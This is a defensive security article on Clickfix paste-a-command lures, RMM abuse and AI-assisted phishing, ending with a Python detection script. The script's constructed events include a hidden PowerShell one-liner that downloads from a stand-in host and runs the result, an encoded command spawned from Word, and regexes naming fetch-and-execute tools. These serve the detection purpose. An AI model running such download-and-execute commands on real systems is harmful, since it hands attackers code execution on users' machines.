Attackers have found a faster way in, and it starts with you. A wave of Clickfix social engineering, combined with increasingly capable AI-driven tooling, lets threat actors skip the malware-laden playbook, slip past perimeter defenses, and walk straight into the heart of corporate networks. The result is a sharp rise in successful intrusions that look like ordinary help-desk assistance rather than malicious code.
How Clickfix Makes Users Into Installers
Clickfix is deceptively simple. Instead of slipping a malicious attachment to a user, the attacker offers a clean-looking “fix” for an everyday annoyance such as a license error, a misbehaving plug-in or a blocked file. The instructions are clear-cut and credible, typically with screenshots and the promise of an instant result.
But the instructions themselves are the trap. Victims are told to open PowerShell or a terminal and paste commands that download and execute a payload. Because the user performs the action, conventional anti-phishing filters that look for clear evidence of malware are often defeated. Microsoft and other security teams have been warning about this tactic for months, and new threat intelligence from Mimecast reports a sudden surge, with Clickfix now accounting for a significant share of observed attacks.
Attackers also fold in legitimate remote monitoring and management (RMM) tools. By convincing users to install an “IT help” agent, they gain persistent access without dropping a suspicious binary. It is social engineering calibrated for the era of remote work and self-service tech support.
How AI Supercharges Modern Social Engineering
Generative AI has turned phishing into a theatrical production. Rather than one email with several typos, attackers build entire conversation threads that read exactly like vendors, executives or accounts payable teams inside the target organization. Mimecast has observed AI-driven chains that unfold over days, complete with attachments, earlier replies and realistic follow-ups.
Business Email Compromise is the clear beneficiary. The FBI’s Internet Crime Complaint Center regularly reports billions of dollars in BEC losses, and AI is widening the funnel. Attackers now deploy deepfake voice and video to “verify” urgent requests, so “please expedite this wire” sounds routine even when it is not. One high-profile case, in which a deepfaked executive voice approved a transaction backed by credible financial context, shows how persuasive this can be.
Crucially, AI delivers personalization at scale. It generates bogus vendor references, mimics real invoice layouts, and varies its phrasing to evade text-based detection. The upshot: fewer tells, greater trust, and faster payouts.
Industries Most in the Crosshairs for These Attacks
Education, IT and telecom, legal services, and real estate face elevated risk. These industries routinely handle sensitive contracts and money movement, and often rely on email to approve changes to both. Real estate is a good example: escrow and title communications are fertile ground for invoice swaps and tampered bank details.
Scattered Spider and TA2541 are among the groups tied to these campaigns that abuse the trust fabric. When every inbox is a supply chain dependency, one convincing email can mean enterprise access.
Why Older Defenses Keep Missing These Human Attacks
Most secure email gateways are good at blocking known-bad attachments and URLs. Clickfix sidesteps both by weaponizing instructions instead. AI-driven campaigns confuse filters further by varying their language and inserting lifelike prior replies.
On endpoints, “living off the land” tactics are even harder to flag without context. PowerShell, WMI and legitimate RMM tools are a necessary evil for IT. Defenders know this, and adversaries keep their activity below common alerting thresholds, combining techniques such as MFA fatigue prompts, token redirects, and session hijacking to persist quietly.
Defenses That Actually Move the Needle Today
- Harden high-impact defaults. Limit scripting with PowerShell Constrained Language Mode and Just Enough Administration, or block standard users from running scripts altogether. Pair this with application control so unauthorized tools and unsigned scripts cannot execute.
- Close the RMM blind spot. Enforce an allowlist of authorized remote-access tools and require code signing; alert on new agent installs or outbound beaconing to unknown control servers. Inventory is a control, not a spreadsheet: keep it live.
- Make payment changes high-friction. Require out-of-band confirmation for bank account changes, vendor additions and payroll updates. Add role-based authorization and waiting periods for large transfers. Your finance workflows are security controls just as much as a firewall is.
- Strengthen email trust signals. Implement DMARC with alignment, even at its most basic level of enforcement, and check for lookalike domains and supplier impersonation. Use external-mail banners judiciously, and teach users that any instruction to paste commands into a terminal is a red flag.
- Lean on detection depth. Endpoint detection and response tools, such as those from Carbon Black, FireEye and Cybereason, should alert on suspicious child processes (e.g., Office spawning PowerShell), malicious script execution, and new persistence keys. Tie that telemetry to rapid containment through isolation playbooks.
- Modernize awareness training. Move past “spot the typo” and rehearse real-life scenarios: fake vendor threads, urgent requests from your CFO backed by a deepfake voicemail, and Clickfix-style “IT fixes.” People are the new perimeter; they need the tools and the time to verify before they comply.
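As an added example (not code from the original article), here is detection logic in Python run over constructed process-creation events. It flags the Clickfix paste pattern described earlier (a shell launched from the desktop that fetches remote content and executes it immediately), Office spawning a shell, hidden or encoded interpreter flags, and an RMM agent missing from an allowlist, which together cover the EDR and RMM bullets above. The event data, the RMM binary names and the allowlist are assumptions, not real telemetry.

```python
import re
from collections import defaultdict

# Constructed process-creation events in the shape of Sysmon Event ID 1 (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 101, "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell -w hidden -nop -c "irm http://update.example.invalid/fix | iex"'},
    {"pid": 102, "parent": "winword.exe", "image": "cmd.exe",
     "cmd": "cmd /c powershell -enc QQBCAEMA"},
    {"pid": 103, "parent": "explorer.exe", "image": "AnyDesk.exe",
     "cmd": "AnyDesk.exe --install"},
    {"pid": 104, "parent": "services.exe", "image": "powershell.exe",
     "cmd": "powershell -File C:\\Scripts\\Backup.ps1"},
]

OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
RMM_ALLOWLIST = {"ApprovedRemote.exe"}          # hypothetical: agents your inventory authorizes
RMM_KNOWN = {"AnyDesk.exe", "RemoteHelper.exe"}  # constructed: agents to flag when not allowlisted

# A Clickfix paste typically fetches something over HTTP and hands it straight to the interpreter.
FETCH = re.compile(r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I)
RUN_FETCHED = re.compile(r"(\biex\b|invoke-expression)", re.I)
# Hidden windows and encoded commands are common in the copy-pasted one-liners.
HIDDEN_OR_ENCODED = re.compile(r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\b)", re.I)


def triage(events):
    """Return {pid: [rule, ...]} for every event that trips at least one rule."""
    hits = defaultdict(list)
    for ev in events:
        image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmd"]
        if parent in OFFICE and image in SHELLS:
            hits[ev["pid"]].append("office_to_shell")
        if image in SHELLS and FETCH.search(cmd) and RUN_FETCHED.search(cmd):
            hits[ev["pid"]].append("download_cradle")
        if image in SHELLS and HIDDEN_OR_ENCODED.search(cmd):
            hits[ev["pid"]].append("hidden_or_encoded")
        if ev["image"] in RMM_KNOWN and ev["image"] not in RMM_ALLOWLIST:
            hits[ev["pid"]].append("unapproved_rmm")
    return dict(hits)


if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

The scheduled backup in event 104 trips nothing, which is the point: the rules key on the combination of parent, interpreter and command-line shape rather than on PowerShell use alone.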
The core story is simple but vital. Clickfix lowers the barrier to execution, and AI lowers the barrier to persuasion. Together they accelerate compromise by turning an everyday click into privileged access. The organizations that adapt their controls accordingly will be the ones that never have to write an apology from inside the breach headlines.